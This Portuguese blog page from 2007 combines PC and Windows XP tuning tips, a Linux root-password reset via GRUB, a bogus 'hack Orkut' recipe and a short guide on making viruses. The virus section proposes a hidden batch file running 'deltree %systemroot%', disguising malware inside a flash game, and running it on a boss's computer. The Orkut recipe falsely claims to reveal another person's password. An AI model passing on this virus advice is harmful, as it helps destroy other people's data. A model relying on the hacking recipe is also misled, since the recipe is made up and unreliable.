domingo, 2 de dezembro de 2007

LEIAM COM ATENÇÃO

Muita gente, em algum momento, se queixa do seu computador. São interrupções na execução das músicas, estalinhos, travamentos, lentidão, incompatibilidades com alguns programas. Mas, ao tomarmos algumas precauções, podemos evitar vários desses problemas e até nos surpreender com a sua nova performance. Aumente o número de pistas gravadas e de plug-ins usados simultaneamente. Evite estalos no som e perdas de sincronismo entre as pistas. Diminua a latência. Diversas sugestões são apresentadas aqui para fazer o seu computador de áudio voar.

Considerações: Cada computador é diferente do outro. Hardware, software, configurações físicas e virtuais são praticamente impossíveis de se repetir de uma máquina para outra. Em comum, quase todos esses bichinhos de estimação têm um certo mau-humor. Às vezes, tudo funciona que é uma beleza, menos o programa que motivou a compra da máquina. Tem também a máquina que sempre trava na presença dos clientes e nunca na frente do técnico de manutenção.

Mas há computadores que são um justo motivo de orgulho para seus donos, e nem sempre são caros. Rápidos, obedientes, inteligentes e versáteis, quase sempre foram montados ou mandados montar por quem convive com eles no dia-a-dia, os maiores interessados no seu funcionamento. E este é mais um bom motivo de orgulho: "fui eu que fiz!"

PC montado por você. Há alguns tipos de computador. O computador de marca (Dell, IBM, Compaq, Itautec), o de fundo de quintal (ofertas "irresistíveis" dos cadernos de informática) e o que a gente mesmo faz ou manda fazer. As vantagens da última opção são inegáveis. Podemos escolher todas as peças, para só usar produtos de primeira linha, e todas compatíveis entre si. E ainda economizamos em relação ao custo dos PCs de marca. Com isso, evitamos sérios conflitos de hardware que acontecem entre placas-mães, placas de vídeo e de som, entre outros.

Informações Técnicas: Use HDs e CPU rápidos o suficiente. Escolha um processador recomendado pelos fabricantes de hardware e software de áudio, como o Intel Pentium ou o AMD Athlon XP. A sua velocidade ou clock é diretamente proporcional ao número de plug-ins e sintetizadores virtuais que podemos usar ao mesmo tempo. Mas a diferença de preço entre diferentes clocks é, muitas vezes, desproporcional. Escolha pelo custo-benefício. O hard disk deve ser rápido para suportar a execução simultânea de muitas pistas de áudio. Os do tipo Ultra-DMA permitem tocar ao mesmo tempo muitas dezenas de pistas gravadas.

Ponha mais memória. A memória (ou a falta dela) é a responsável pelo computador atuar mais "acordado" ou mais "sonolento". Para carregar uma penca de plug-ins e sintetizadores, precisamos de bastante memória. Hoje, é bom usar pelo menos 512 MB. Um giga de RAM deixa o computador bem à vontade. Não use menos de 256 megabytes para gravar e mixar áudio.

Se for aumentar a memória, use pentes rigorosamente idênticos, em tudo. E memória de marca, como NEC ou MT, deixa o computador mais rápido.

Desfragmente com freqüência o seu HD. Os discos de música, como o CD e o vinil, gravam as informações seqüencialmente, numa espiral de dentro para fora (CD) ou de fora para dentro (vinil). Discos de dados, como o disco rígido do computador, registram as informações em pequenos setores ao longo do disco. À medida que as informações vão sendo processadas e substituídas, vão ocupando ou esvaziando os setores de forma cada vez mais desorganizada, deixando muitas "clareiras" no disco.

Desfragmentar é como arrumar o nosso quarto, colocando tudo em ordem: a sensação de mais espaço, tudo no seu lugar, fácil de achar. Com as informações todas arrumadas em seqüência, sobra uma grande área livre para o HD gravar novos dados e fica muito mais fácil para o Windows localizar as informações.

Ao desfragmentar seu HD, use um no-break, um pequeno gerador de eletricidade que é ativado automaticamente por alguns minutos quando falta luz. Há diversos casos relatando perda total de hard disks por interrupção no fornecimento de energia elétrica durante a desfragmentação. Faça durante a noite ou tire um dia de folga: leva horas. Feche todos os programas. Clique em , , , e em .

Se você grava som freqüentemente, procure desfragmentar o HD pelo menos uma vez por semana, para mantê-lo sempre ágil.

Use 16 bits de cores no vídeo. Melhore o desempenho usando 16 bits de cores em vez de 24 ou 32 bits. Para mudar a quantidade de cores, na área de trabalho do Windows, clique com o botão direito sobre um espaço livre e então clique em , e . Não use protetor de tela, desktop ativo ou recursos de economia de energia do HD ou do monitor. Nem use jamais aqueles lindos desenhos animados para proteger a tela, que aparecem bem no meio da mixagem, paralisando a música. Aliás, há muitos anos os monitores de vídeo SVGA dispensam estas proteções.

Desabilite sons e programas de fundo. Os sons do Windows são fonte de conflitos com os programas de gravação. Clique em e em . Depois, em , e na lista escolha .

Diversos programas se abrem junto com o Windows e ficam funcionando o tempo todo. Alguns, nós nem percebemos. Por exemplo, o Norton Internet Security é uma excelente ferramenta. Cioso de suas responsabilidades Mr. Norton fica a todo instante contando o que está fazendo e perguntando se pode fazer mais umas outras tantas coisas. Numa máquina de internet, este comportamento do programa é louvável. Num computador de gravação, é tudo o que não queremos. Desabilite as funções automáticas do antivírus e do firewall e passe a executá-las manualmente, para não interromper o pesado fluxo de dados do áudio.

Clique em , depois em e então digite “msconfig” e clique em . No utilitário de configuração do sistema, clique em e - só se souber bem o que está fazendo - desabilite os programas que não deverão mais iniciar sozinhos. Clique em e reinicie o computador, o que deverá acontecer mais rápido do que na última vez...

Recomendação: Evite programas desnecessários. Muitos computadores comprados prontos vêm com uma série de programas já instalados, como antivírus, conexões à internet, editores de texto e programas gráficos. Depois, instalamos novo hardware e, com ele, mais uma penca de programas, que às vezes são concorrentes até inferiores de outros que já temos. Um exemplo são os programinhas para tocar MP3, alguns mais pobres que o próprio Windows Media Player. Fora programas de CDs de revistas e outros baixados da internet por curiosidade. Aliás, programa gratuito, muitas vezes, só é gratuito porque não é bom, com honrosas exceções.

Os programas desnecessários desorganizam o seu hard disk e usam memória no registro mesmo quando não estão sendo utilizados. Quando mal-escritos, podem causar instabilidade ao sistema. Muitos rodam continuamente ao fundo, roubando tempo de processamento de seus programas de áudio.

A formatação do HD é a maneira mais rápida e segura de nos livrarmos de programinhas indesejáveis, embora traga alguma dor de cabeça com backups, novas instalações e configurações de programas. Caso não seja recomendável, ao desinstalar cada software, certifique-se de que suas entradas no registro do Windows foram todas removidas, como veremos adiante.

Atualize os drivers das placas de áudio e MIDI. Visite sempre os sites dos fabricantes de suas placas e mantenha-as em dia, baixando dessas páginas e instalando o software compatível com o seu Windows. Se usa o Cakewalk SONAR, use os drivers WDM das placas de som.

Reinicie a máquina a cada instalação ou desinstalação. Para que o registro do Windows tenha armazenadas as informações corretas sobre programas instalados ou desinstalados, mande reiniciar o computador sempre que for alterar a sua base de programas. Se você, por acaso, pretende instalar meia dúzia de programas, convém reiniciar o PC meia dúzia de vezes, cada uma após uma instalação.

Limpe as entradas dos programas desinstalados no registro do Windows. Isto pode fazer a diferença entre um programa rodar ou travar. Dois programas estavam dando conflito. Você desinstalou um deles e o conflito persistiu. Desinstalou e reinstalou o outro e os problemas continuaram. No registro do Windows, permaneceram intactas dezenas ou centenas de entradas referentes ao programa brigão, que, mesmo depois de desinstalado, insiste em impedir o outro de funcionar. É preciso retirar essas entradas do registro. Mas registro não é coisa com que se brinque.

O registro do Windows é um banco de dados que contém, entre outras coisas, informações sobre o hardware e o software instalados. Muitos programas guardam ali detalhes sobre suas próprias configurações, o que torna o registro um lugar curioso e perigoso. Acesse o editor do registro clicando em e em e teclando “regedit”, sem as aspas. É fundamental retirar as informações sobre os programas ou demos desinstalados, mas é arriscado. Um excelente programa freeware que limpa automaticamente as entradas no registro dos programas que determinamos é o RegCleaner.

Padrão Como Quebrar senha root... - 02-11-2007, 9:37
Bom pessoal, aqui descreverei como quebrar a senha de root num sistema operacional Linux partindo daquele menu montado pelo GRUB/LILO na hora do boot.
Usem isso com responsabilidade para caso tenham esquecido a senha ok? Não quero ninguém por ai tentando detonar micros alheios… rs
Pra falar a verdade é muito simples. Em uns 2 minutos da pra fazer. Quem me ensinou isso foi o Luciano L. Mendes, meu instrutor de Linux do curso Conectiva Pro++. valeu Luciano!

Gostaria de ressaltar que isso não é nenhum bug. São apenas recursos do GRUB/LILO de passar parâmetros para o kernel do Linux. Para se proteger desse tipo de problema, basta configurar o GRUB/LILO para não permitir que os usuários editem as linhas no boot.

COMEÇANDO:
À partir da tela do GRUB/LILO devemos editar a linha referente ao boot do kernel. No grub basta selecionar a linha do linux e pressionar “E”. Em seguida pressionar “E” novamente na linha do kernel, assim podemos editá-la. Passaremos um parâmetro adicional ao kernel desviando o INIT.
A linha deve ser algo como:
kernel = (hd0,1)/boot/vmlinuz-2.6.5-63255U10_1cl root=/dev/hda2

Na frente da linha damos um espaço e inserimos o seguinte parâmetro: init=/bin/bash
Fica assim:
Código:
kernel = (hd0,1)/boot/vmlinuz-2.6.5-63255U10_1cl root=/dev/hda2 init=/bin/bash

Feito isso pressione ENTER para alterar e em seguida pressione “B” para disparar o kernel. Isso no GRUB… pelo lilo não lembro como edita-se as linhas.

O kernel irá subir mas o INIT será desviado abrindo um BASH limpinho pra você com os poderes de root. Ainda não podemos mexer em nada pois o sistema está montado como “somente leitura”.

Devemos então remontar o sistema como “RW” (leitura e escrita) mas não há como desmontar. Então faremos isto da seguinte forma:
Código:
mount -o remount,rw /


Prontinho. Você tem permissão de escrita e poderes de root. Vale lembrar que o INIT não foi disparado portanto nada deve funcionar. Nem os aplicativos estão no seu PATH. Tudo que você deve fazer agora é editar o arquivo /etc/shadow com o vi:
Código:
vi /etc/shadow


Localize a linha referente à senha do root… ex:
root:estaaquieasenhacriptografada:12707:0:99999:7: ::

Os dados estão separados por colunas usando o “:” como delimitador. No caso o conteúdo “estaaquieasenhacriptografada” representa a senha de root criptografada. Delete esse conteúdo mas não remova o “:” (dois pontos) antes nem o depois da senha!!!!!!!!!! Isso pode comprometer seu sistema!

Feito isso você zerou a senha do root. Basta reiniciar a máquina normalmente que a senha do root estará vazia. Agora que você já reiniciou seu computador, basta logar como root e apenas pressionar ENTER no momento da senha sem digitar nada que o login será efetuado com sucesso.

Feito isso ALTERE SUA SENHA O MAIS RÁPIDO POSSÍVEL!

Antes que alguém pergunte… para impedir esse tipo de ataque basta colocar um belo de um password no grub. Basta dar uma olhadinha no TODO PODEROSO: MAN

Agora não vai me esquecer a senha de novo heim!!!

Fonte: http://www.tuxresources.org/blog/




O Windows XP tem se apresentado como um sistema operacional rápido e estável, por incrí*vel que pareça. E, para aqueles que o acharam rápido, e querem melhorar a performance; ou para os que o acharam lento e querem tentar deixá-lo mais ágil, preparei um guia de otimizaçao do Windows XP.

:. Melhorando o desempenho

O Windows XP já é rápido. Mas ele pode ficar mais ágil se você desabilitar serviços e “enfeites” desnecessários. Vamos ver como fazê-los:

:. Opções Visuais

O WinXP é bonito, traz inovações visuais interessantes. Mas isto consome recursos do micro, principalmente se sua placa de ví*deo não é muito robusta. Desabilitar estas opções deixará seu equipamento mais veloz, independente da configuraçao (claro que isso pode ser mais ou menos perceptí*vel de acordo com a robustez do equipamento). Para fazer as alterações, vá no Painel de Controle > Sistema > Avançado > Desempenho > Configurações. Em Efeitos visuais, desabilite os efeitos indesejados (se preferir desabilitar todos, basta selecionar “Ajustar para o melhor desempenho”).

Uma opçao normalmente desnecessária que também consome recursos é o “Desktop offline”. Este recurso permite que outras pessoas através da rede ou Internet possam ver seu Desktop (írea de Trabalho). Para desativá-lo, siga os seguintes passos:

Painel de Controle > Video > írea de Trabalho > Personalizar írea de Trabalho > Web > Propriedades > em Documentos da Web, desabilite a caixa “Tornar esta página disponí*vel offline”.

Ainda nas propriedades de ví*deo, lá na aba Geral, pode-se desativar o Assistente para Limpeza da írea de Trabalho (Painel de Controle > Video > írea de Trabalho > Personalizar írea de Trabalho > Geral > desabilitar “Executar o assistente para limpeza a cada 60 dias”. Este recurso varre e remove da área de trabalho í*cones de programas que já não existem ou foram modificados. Como fica residente, também consome recursos – a limpeza pode ser feita manualmente.

:. Desabilitando serviços desnecessários

O WinXP, por padrão, mantém ativos uma série de serviços que são desnecessários para a maioria dos usuários. Para desativá-los/configurá-los, vá em Painel de Controle > Ferramentas Administrativas > Serviços. í‰ preciso, no entanto, saber o que se está fazendo, já que desabilitar serviços realmente necessários para o sistema fará com que seu Windows possa ficar mais lento ou que algumas coisas deixem de funcionar (como Internet, por exemplo).

Recebi a sugestão, para aqueles que não sabem quais os serviços que precisam, de configurar todos os serviços para a opçao “Manual”, e reiniciar o micro. O boot será lento, já que o Windows terá de iniciar todos os serviços que precisa “na força”. Então, bastaria ver os serviços iniciados e configurá-los para “Automático”. Não testei esta dica, mas é válida. í‰ preciso salientar que alguns serviços necessários podem não ser inicializados automaticamente.

O melhor mesmo é saber o que faz cada um deles. Vou tentar descrever aqui alguns, há outros cuja funcionalidade não fica muito clara então prefiro não arriscar – deixo-os habilitados (Automático). As recomendações são para um usuário doméstico comum, com uma pequena rede em casa. Atente para o fato de que estas configurações podem variar caso a caso, não existe uma regra especí*fica – o que está abaixo é algo mais comum, mas não certo para todos:

AUTOMíTICO

Alerta (emite alertas administrativos)
Alocador Remote Procedure Call (RPC)
Armazenamento protegido (favorece a segurança do computador)
íudio do Windows (possibilita a ativaçao de dispositivos de áudio.)
Chamada de procedimento remoto (RPC)
Cliente da Web (necessário para algumas situações, como o Windows Update)
Cliente de rastreamento de link distribuí*do
Detecçao do hardware do Shell
Estaçao de trabalho (gerencia conexões com servidores remotos)
Gerenciador de contas de segurança (Responsável por armazenar senhas locais)
Gerenciador de discos lógicos (Gerencia unidades de disco rí*gido)
Localizador de computadores
Log de eventos
Logon secundário
Notificaçao de eventos de sistema
Plug and Play
Serviço de restauraçao do sistema (se não usa ou não sabe o que é, pode deixar em Manual)
Serviços de criptografia
Serviços IPSEC
Sistema de eventos COM+
Spooler de impressão
Temas
Testador de instrumentaçao de gerenciam. do Windows

DESABILITADOS

Acesso a dispositivo de interface humana (usado para dispositivos especiais de entrada)
Ajuda do cartão inteligente (Ajuda para dispositivos Smart Cards)
Cartão inteligente (ativa dispositivos de Smart Card)
Compartilhamento remoto da área de trabalho do NetMeeting
Configuraçao zero sem fio (necessário para dispositivos 802.11)
Gerenciador de conexão de acesso remoto automático
Gerenciador de sessão de ajuda de área de trabalho remota
Horário do Windows (Mantém data e hora em sincronia com servidores de rede)
IMAPI CD-Burning COM Service (Ativa o recurso de gravaçao de CDs embutido do Windows XP) – Se vc grava CDs usando apenas os recursos do Windows XP, deixe em Manual (padrão)
Número de série de mí*dia portátil
Registro Remoto (por questão de segurança – permite que usuários remotos alterem o Registro do seu Windows)
Roteamento e acesso remoto
Sistema de alimentaçao ininterrupta (Gerencia No-Breaks) (Se você usa um no-break, deixe em Automático)
Telnet (por questão de segurança)

MANUAL

Adaptador de desempenho WMI
Agendador de tarefas (Agenda tarefas para serem executadas em data e hora pré-determinadas)
Ajuda e suporte (Ativa assistentes e ajuda avançada)
Aplicativo de sistema COM+
írea de armazenamento (Compartilha informações com computadores remotos)
Armazenamento removí*vel (Dispositivos de armazenamento removí*veis, como Zip Drives)
Assistente de aquisiçao de imagens do Windows (WIA)
Atualizações automáticas (faz o download automaticamente de atualizações do Windows)
Auxiliar NetBIOS TCP/IP
Carregar Gerenciador (gerencia transferências de arquivos entre computadores da rede.)
Cliente DHCP (necessário para alguns tipos de conexão í Internet)
Cliente DNS (necessário para alguns tipos de conexão í Internet)
Compatibilidade com Troca rápida de usuário
Conexões de rede (gerencia conexões de rede)
Coordenador de transações distribuí*das (Coordena gerenciadores de recursos)
Cópia de volume em memória
DDE de rede (Habilita o Dynamic Data Storage)
DSDM de DDE de rede (Gerencia compartilhamentos de rede DDE)
Erro ao informar o serviço (Informa erros de serviços e aplicativos de terceiros)
Extensões de driver de instrum. gerenc. do Windows (Gerenciamento de drivers)
Firewall de conexão com a Internet (FCI) / Compartilhamento de conexão com a Internet (CCI)
Fornecedor de suporte de segurança NT LM
Gerenciador de conexão de acesso remoto
Gerenciamento de aplicativo
Host de dispositivo Plug and Play universal
Logon de rede
Logs e alertas de desempenho
Mensageiro (Serviço de mensagens entre computadores da rede. NíƒO í‰ o Windows Messenger)
MS Software Shadow Copy Provider
Número de série de mí*dia portátil
QoS RSVP (Habilita services compatí*veis com o QoS)
Reconhecimento de local da rede (NLA)
Serviço administrativo do gerenciador de disco lógico
Serviço de descoberta SSDP
Serviço de indexaçao
Serviço de transferência inteligente de plano de fundo
Serviço Gateway de camada de aplicativo
Serviços de terminal
Servidor
Telefonia
Windows Installer

Para maiores detalhes das funções de cada serviço, consulte a Ajuda ou a Microsoft.



:. Habilitando o modo UDMA/66 e superior

Painel de Controle > Sistema > Gerenciador de Dispositivos > Controladores IDE/ATAPI > Canal IDE Primário (e secundário também, se for o caso) > Configurações Avançadas > Em Modo de Transferência, selecionar “DMA se disponí*vel”.

:. Habilitar Logon automático – inicializaçao e desligamento mais rápido

Se há somente um usuário no micro, que tal agilizar o processo de boot e desligamento? Para isto, temos que seguir algumas etapas:

a. Vá em Iniciar > Executar e digite "control userpasswords2" (sem aspas) e clique em OK.
b. Na aba Usuários, desabilite a opçao “Usuários devem entrar um nome e senha para usar este computador” e clique em Aplicar.
c. Surgirá uma caixa de diálogo solicitando nome de usuário e senha. Selecione o nome do usuário padrão e coloque uma senha (atençao: não é recomendável deixar esta senha em branco), clique em OK.
d. Vá no Painel de Controle > Contas de Usuário e clique em “Alterar o modo como usuários fazem logon ou logoff” e desabilite as opções “Use a tela de boas-vindas” e “Use a Troca Rápida de Usuário”.

:. Desabilite programas desnecessários da inicializaçao

Iniciar > Executar, digite “msconfig” (sem aspas). Na aba Iniciar, desabilite os programas que não quer que iniciem junto com o Windows.

:. Explore outras máquinas da rede mais rapidamente

Quando procura por outros computadores na rede, o Windows XP verifica por tarefas agendadas em comum nas mesmas. Desabilitar este recurso faz com que a procura por outros micros da rede seja bem mais ágil. Siga as etapas abaixo:
Iniciar > Executar, digite “regedit” (sem aspas), pressione OK.
Vá em HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/ RemoteComputer/NameSpace
e procure pela chave {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Apague-a e pronto. A visualizaçao/navegaçao por outras estações da rede ficará mais rápida.

:. Deixe o menu Iniciar mais rápido

Vá em Iniciar > Executar, digite “regedit” (sem aspas), pressione OK.

Vá em HKEY_CURRENT_USER\Control Panel\Desktop. Selecione MenuShowDelay na lista da direita. Clique com o botão direito do mouse, selecione Modificar e mude o valor para 0 (zero). Reinicie o micro e veja a diferença.

:. Gerencie melhor o arquivo de troca (memória virtual)

Computadores domésticos com mais de 512Mb normalmente não precisam usar a memória virtual, que acaba ocasionando perda de desempenho. Para desativá-la, vá em Painel de Controle > Sistema > Avançado > Desempenho > Avançado > Memória Virtual > Alterar. Selecione “sem arquivo de troca”, clique em Definir e OK.

Caso precise usar a memória virtual, calcule-a com base em 1,5x a quantidade de memória RAM disponí*vel (por exemplo, se você tem 128Mb de RAM, seu arquivo de troca será de 192Mb), e defina-o como tamanho inicial e máximo simultaneamente. Isto fará com que o tamanho do arquivo de troca seja fixo, prevenindo perda de desempenho e fragmentaçao do mesmo.

Se perceber travamentos ou perda de desempenho, deixe que o Windows gerencie a Memória Virtual para você; í s vezes é a melhor opçao.

:. Boot mais rápido

A Microsoft liberou uma ferramenta que promete tornar o boot e retorno dos modos “Suspender” e “Hibernar” mais rápido. Trata-se do Bootvis, que pode ser baixado diretamente clicando aqui (325 Kb).

Basicamente, basta ir em Trace > Optimize System que ele fará o resto.

:. Desligamento lento com drivers Detonator 21.83 da Nvidia

Para os que usam os drivers Detonator: devem ter percebido que o encerramento do Windows é lento. Para resolver este problema, vá no Painel de Controle > Ferramentas Administrativas > Serviços e altere o NVidia Driver Helper para “manual” ou “desabilitado”. A versão mais nova do driver (23.11) já corrige este bug.


:. Desabilite a reproduçao automática para CDs

Vá em Iniciar > Executar e digite “gpedit.msc” (sem aspas). Vá em Configuraçao do Computador > Modelos Administrativos > Sistema. Dê um duplo-clique sobre “Desabilitar reproduçao automática”. Selecione Ativar.

:. Libere 20% de sua banda de rede/Internet

O Windows XP possui um recurso (Agendador de pacotes QoS) que “reserva” 20% da banda disponí*vel de rede e Internet para uso próprio. Para desabilitá-lo, siga os seguintes passos (Observaçao: é preciso estar logado como Administrador para executar os procedimentos abaixo):

a. Iniciar > Executar, digite gpedit.msc e pressione OK.
b. Configuraçao do computador > Modelos Administrativos > Rede
c. Selecione, na janela esquerda, “Agendador de pacotes QoS”. Na janela da direita, dê duplo- clique na em “Limite de reserva de banda”.
d. Na aba Configuraçao, selecione Ativado. Na linha “Limitar % da banda”, digite 0 (zero). Clique em Aplicar, OK e saia.
e. Vá nas configurações da rede (Painel de Controle > Conexões de Rede), clique com o botão direito na conexão existente, selecione Propriedades. Na aba Geral, habilite o Agendador de Pacotes QoS (se já estiver habilitado, deixe como está). Reinicie o computador.

Se houver mais de um computador em rede, é preciso seguir este procedimento em todos para que haja benefí*cio real desta dica.

Para mais informações sobre o QoS (Quality of Service), visite o site da Microsoft sobre o assunto em http://msdn.microsoft.com/library/de...tgqos_3hk4.asp

:. Carregue o Internet Explorer mais rapidamente

Quando o IE é aberto, mesmo que não haja uma página da Web definida como inicial, ele carregará a ‘instruçao’ “about:blank”. Desabilitar esta ‘instruçao’ torna-o mais rápido ao carregar.

Para fazer isto, basta adicionar o comando “-nohome” no atalho do IE que você costuma usar. Clique com o botão direito no atalho, vá em Propriedades, e na linha Objeto, adicione (após as aspas) o comando –nohome. Ficará algo assim: "C:\Arquivos de Programas\Internet Explorer\IEXPLORE.EXE” -nohome

Clique em OK e pronto!

:. Evitando lentidão e problemas

Esta dica é válida para qualquer versão do Windows e é “básica”: mantenha sempre o disco rí*gido desfragmentado (Desfragmentador) e livre de erros (Scandisk nos Win9x/Me; CHKDSK/CHKNTFS nos Win2k/XP). í‰ aconselhável, sobretudo, desfragmentar o disco após apagar grandes volumes de dados ou antes de instalar programas ou acrescentar grandes volumes de dados.

Você pode acrescentar o Desfragmentador ao menu de contexto. Basta abrir o Bloco de Notas e colar o seguinte conteúdo:

; context_defrag.INF

; Adiciona o Desfragmentador ao menu de contexto no Windows XP

[version]
signature="$CHICAGO$"

[DefaultInstall]
AddReg=AddMe

[AddMe]

HKCR,"Drive\Shell\Desfragmentar\command",,,"DEFRAG.EXE %1"

Salve onde desejar com o nome defrag.inf (atençao para não salvá-lo como .TXT). Abra o Windows Explorer, selecione o arquivo criado, clique com o botão direito e selecione Instalar. Depois, basta clicar com o botão direito em uma letra de unidade no Windows Explorer; aparecerá a opçao “Desfragmentar”. Se preferir, clique aqui (233 bytes) para fazer o download do arquivo pronto.

:. Segurança e Privacidade

Que o Windows XP tem brechas de segurança, todo mundo sabe. Mas muitas dessas brechas podem ser fechadas facilmente, de modo a não facilitar a açao de crackers ou pessoas mal- intencionadas. Vamos ver?

:. Desabilite a Assistência Remota

A Assistência Remota é um recurso interessante para usuários que precisam de suporte rápido, permitindo que outra pessoa controle seu micro. Mas mantê-lo sempre habilitado não é uma boa idéia. Para desabilitá-lo, vá em Painel de Controle > Sistema > Remoto e desabilite as opções “Permitir que este computador envie convites de Assistência Remota” e “Permitir que usuários se conectem remotamente a este computador”.

Para desativar de vez estes serviços, vá em Iniciar > Executar, digite gpedit.msc e pressione OK. Vá em Configuraçao do Computador > Modelos Administrativos > Sistema > Assistência Remota. Configure ambos os serviços para Desabilitado.

:. Desabilite Serviços que abrem brechas

A menos que você realmente o use, o Telnet abre as portas para uma invasão. Para desabilitá-lo, vá em Painel de Controle > Ferramentas Administrativas > Serviços. Altere o serviço Telnet de “manual” para “desabilitado”. Desative também os serviços “Compartilhamento remoto da área de trabalho do NetMeeting” e “Registro Remoto”.

:. Desabilite a Notificaçao de Erros í Microsoft

Toda vez que ocorre um erro ou travamento, o Windows lhe recomendará enviar informações í Microsoft. Para evitar isto, vá nas propriedades de Sistema (Painel de Controle > Sistema), em Avançado > Notificaçao de Erros, e selecione “Desabilitar a Notificaçao de Erros”.

:. Verifique a segurança de seu Windows XP

A Microsoft disponibilizou um teste de segurança para o Windows XP. Para fazer o teste, basta ir em http://www.microsoft.com/technet/mpsa/start.asp e clicar em Scan Now.

:. Internet

:. Para impedir que o Windows Messenger inicie junto com o Windows

Modo 1:
Iniciar > Executar > msconfig
Na aba Iniciar, desabilite o serviço “msmsgs” (Windows Messenger).
No entanto, inexplicavelmente em alguns casos ele volta. Então, apelamos para o método seguinte:

Modo 2:
Vá na pasta Arquivos de Programas > Messenger e renomeie o arquivo msmsgs.exe para outro nome qualquer (msmsgsbobo.old, por exemplo).

Modo 3:
Iniciar > Executar > gpedit.msc
Na janela que abrirá, vá em Configuraçao do Computador > Modelos Administrativos > Componentes do Windows > Windows Messenger. Clique duas vezes na opçao “Não permitir que o Windows Messenger inicie automaticamente”, e selecione “Ativado”.Se preferir, pode desativar de vez o Windows Messenger, alterando a opçao “Não permitir que o Windows Messenger seja executado” para “Ativado”. Isto impedirá a utilizaçao do WM por qualquer usuário do micro.



invaadir orkut


faz isso:PASSO 1:
Conecte-se ao MSN.
PASSO 2:
Encontre a pessoa que pretende invadir.
PASSO 3:
Clique para enviar uma mensagem para ela.
PASSO 1:
Agora siga corretamente o que escrever em cada linha:
1ª linha, digite: 127.0.0.1\\?\\ping\\RAEK\\CAH\\ETU\\OVUE\\?
2ª linha, digite: o email dessa pessoa, exemplo: fulano@hotmail.com ... sem espaço nem antes nem depois do endereço 3ª linha, digite: 127.0.0.1\\?\\ping\\WOHL\\ARAC\\ORRU\\BUO\\SUE\\?
4ª linha, digite: o seu email.
Envie a mensagem
PASSO 4:
Você vai receber no seu email todas as informações de login e senha da pessoa.



Vírus: Como Criar, e Como se Defender com Responsabilidade
Como criar um vírus?

Pra que você quer saber como criar um vírus? Bem... A responsabilidade é sua, blz? Nesta dica você terá uma aulinha prática de como criar um vírus que detona TUDO do HD.

Um vírus é um programa do mal, que faz mal ao sistema operacional, a outros programas ou a arquivos do computador. Podem ser ainda de outros tipos, mas estes são os mais comuns. Basicamente, um vírus é um programa. Um programa com instruções que poderiam ser usadas para o bem, mas aplicadas para o mal. Portanto, para fazer um vírus, aprenda a fazer programas. Existem, no entanto, meios mais simples que permitem a criação de vírus usando determinadas estratégias, ferramentas e recursos já existentes. Além de saber fazer o vírus, você deve saber o que ele fará. O vírus ataca alguma coisa. Você deve conhecer essa coisa, seus pontos fracos e fortes, verificar caminhos por onde entrar. E como rodá-lo? O meio mais simples é convencer os usuários a executar o arquivo do vírus nos seus computadores. Ou você mesmo, por exemplo, pode executá-lo no computador do chefe enquanto ele estiver almoçando. Para ajudar, existem programas que embutem um executável dentro de outro, de modo que um seja executado normalmente, e o outro de forma oculta. Isso permite, por exemplo, criar um joguinho em flash (ou pegar uma dessas muitas animações distribuídas em .exe, o projetor do flash), embutir o vírus nele e mandar pra pessoa. Ela abre, vê o joguinho, acha lindo. E por trás de tudo isso, enquanto ela está distraída e entretida, o vírus trabalha. Ou simplesmente se copia para alguma pasta, cria entradas no registro do Windows para se iniciar na próxima sessão, e ataca a partir dali.

E os anti-vírus, como ficam? Irão bloquear seu vírus? Eles não sabem se um programa é um vírus ou não, a menos que tenham a "identidade" deste programa marcada como "suja", como um vírus. Isso acontece quando o vírus fica muito divulgado, e acaba caindo nas mãos do pessoal das empresas de anti-vírus. Eles checam o arquivo, fazem testes e mais testes. Comprovado o caso de ser um vírus (ou seja, de ser um programa do mal), eles criam um código que identifica exclusivamente aquele arquivo (por exemplo, uma somatória MD5, um trecho de código existente no arquivo, uma seqüência de operações que provavelmente só existam naquele arquivo, etc). E cadastram esse código no anti-vírus. Ao fazer a varredura, se o anti-vírus identificar algum arquivo com algumas qualidades cadastradas em seu banco de dados, ele entenderá ele como vírus e tentará eliminá-lo ou notificar o usuário. Por isso é bom estar sempre com seu anti-vírus atualizado, pois praticamente todo dia surgem novos vírus. Estando atualizado, ele pode identificar os vírus mais recentes. Mesmo que um programa seja o pior vírus já inventado, se ele não estiver catalogado no anti-vírus, ele provavelmente se dará muito bem e executará suas funções. Depois? Depois é tarde, né. Já eu, particularmente, não uso anti-vírus, pois sei me cuidar. Não quero um programa verificando tudo o que faço e deixando meu micro mais lento. Muita gente reclama do Windows e talz e bla bla bla. Mas essa gente poderia parar um pouco e pensar nela mesma, nas atitudes. A maioria dos vírus e spywares só consegue realizar seus objetivos porque o usuário do computador vacilou. Mas blz, isso não vem ao caso agora.

Um vírus não precisa ser necessariamente um programa. Você deve estudar e conhecer o que quer atacar, e usar meios para isso. Por exemplo, apagar arquivos. Criar um ".bat" com o comando "deltree %systemroot%" adaptado para não mostrar nada, por exemplo. Esse arquivo pode ser considerado um vírus, embora é um simples arquivo ASCII, de texto puro. O interpretador de comandos é que vai executar as ações, de acordo com o que estiver indicado. De forma semelhante agem os vírus de scripts e macros: por isso, é bom tomar cuidado com apresentações do Power Point de desconhecidos, arquivos do Word, etc. Não precisa ser paranóico e ficar sem abrir esses arquivos, basta pensar e desativar as macros no seu programa, entre outros cuidados. Usar o visualizador do PowerPoint, em vez do PowerPoint completo, é uma boa idéia para ver apresentações da Internet, já que as macros e arquivos vinculados nem serão interpretados. No caso de scripts ".js" ou ".vbs", só execute-os se souber realmente o que está fazendo. Destaco que esse ".js" não é de "JavaScript", pois esta mesma extensão é usada por scripts inofensivos em páginas da web para adicionar funcionalidade. Como dito, cuide-se, mas não caia nas paranóias. Não é porque a AIDS come solto que você vai deixar de transar com pessoas que conhece a pouco tempo ou na balada, mas deverá se cuidar, né? A mesma coisa pode ser dita em termos de PCs. Execute programas, rode, teste, fuce, explore, mas com responsa. Isso fica por sua conta. Do mesmo jeito que "sexo 100% seguro é não fazer sexo", eu diria que "navegar na Internet de forma 100% segura é não navegar na Internet". Se você está na chuva, é para se molhar. Às vezes até mesmo com o melhor guarda-chuva ou capa você ainda se molha legal, e pode pegar um resfriado... Por essas e outras, arquivos e projetos importantes eu mantenho num PC sem acesso a Internet (nem modem nem placa de rede ele tem).

Bom, chega de teoria, não que não seja importante, mas já falei demais. Se você quer fazer vírus, arregace as mangas e parta para o estudo, você deverá estudar e fuçar muito. E cuidado para o feitiço não virar contra o feiticeiro, he he he.

